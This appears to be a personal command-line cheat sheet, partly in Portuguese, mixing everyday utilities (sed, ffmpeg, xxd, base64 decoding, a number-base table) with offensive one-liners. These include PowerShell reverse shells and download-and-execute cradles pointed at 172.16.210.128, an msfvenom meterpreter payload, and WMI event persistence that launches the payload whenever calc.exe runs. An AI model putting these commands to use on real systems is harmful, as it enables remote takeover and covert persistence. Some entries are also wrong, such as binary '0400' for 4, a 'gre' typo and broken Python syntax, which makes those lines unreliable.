grep -R 'string' dir/
wget --limit-rate=200k --no-clobber --convert-links --random-wait -r -p -E -e robots=off -U mozilla http://www.asdasdsaqd.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -nop -exe bypass "Import-Module c:\temp\shell.ps1; Invoke-PowerShellTcp -Reverse -IPAddress 172.16.210.128 -Port 5060"
powershell -nop -exe bypass -c "iex (New-Object Net.WebClient).DownloadString('http://172.16.210.128/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 172.16.210.128 -Port 5060"
wget https://github.com/danielbohannon/Invoke-Obfuscation/archive/master.zip
wget https://raw.githubusercontent.com/Sw4mpf0x/PowerLurk/master/PowerLurk.ps1
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=172.16.210.128 lport=443 -f exe -o met.exe
powershell -nop -exe bypass -c "iex(New-Object Net.WebClient).DownloadString('http://172.16.210.128/PowerLurk.ps1'); Register-MaliciousWmiEvent -EventName metcalc -PermanentCommand 'cmd.exe /c C:\temp\met.exe' -Trigger ProcessStart -ProcessName calc.exe"
powershell -nop -exe bypass -c "iex(New-Object Net.WebClient).DownloadString('http://172.16.210.128/PowerLurk.ps1'); Get-WmiEvent -Name metcalc"
powershell -nop -exe bypass -c "iex(New-Object Net.WebClient).DownloadString('http://172.16.210.128/PowerLurk.ps1'); Get-WmiEvent -Name metcalc | Remove-WmiObject"
powershell.exe -ExecutionPolicy bypass .\test.ps1
powershell Get-Service | Where-Object Status -eq running
1..10 | ForEach-Object {$_ * 2}
Get-Command *process
powershell.exe -exec bypass .\teste.ps1
powershell -exec bypass -noprofile .\teste.ps1
powershell -c “<comando>”
ffmpeg -i video.mp4 -vf scale=400:-1 -r 3 -f image2pipe -vcodec ppm - | convert -delay 5 -loop 0 - video.gif | convert -layers Optimize - video.gif
ssh user@server -p 22 'bash -s' < cmd.sh
strings FILE
strings FILE |gre STRING
import hashlib
hashlib.md5("meuovo".encode("utf")).hexdigest()
echo 0x00000000746F6F72 | xxd -rp
printf intrd | xxd
echo $((0x3c))
printf "\101\n"
python hex to dec
python -c "print(int('0x00000000746F6F72', 16))"
python -c print '"deadbeef".decode("hex")''
python -c "print hex(int(65537))"
python -c 'import base64; print(base64.b64encode("dssss"))'
python -c 'import base64; print(base64.b64decode("dsfdsfsdfd="))'
python -c 'import base64; print(base64.b64decode("SEFDS0FGTEFHe09ubHkgU24wd2QzbiBjYW4gZGl2aWRlIGJ5IFplcjB9Cg=="))'
sed -i 's/foo/bar/g' FILENAME
sed -i 's/(//g' abc_patched.txt
sed "s/[^0-9]//g" ARQUIVO
sed '/^\s*$/d' ARQUIVO
python -c "print('TEXT').lower()"
python -c "print('text').upper()"
Hex | Dec | Oct | Bin |
---|---|---|---|
0 | 0 | 0 | 0000 |
1 | 1 | 1 | 0001 |
2 | 2 | 2 | 0010 |
3 | 3 | 3 | 0011 |
4 | 4 | 4 | 0400 |
5 | 5 | 5 | 0101 |
6 | 6 | 6 | 0110 |
7 | 7 | 7 | 0111 |
8 | 8 | 10 | 1000 |
9 | 9 | 11 | 1001 |
A | 10 | 12 | 1010 |
B | 11 | 13 | 1011 |
C | 12 | 14 | 1100 |
D | 13 | 15 | 1101 |
E | 14 | 16 | 1110 |
F | 15 | 17 | 1111 |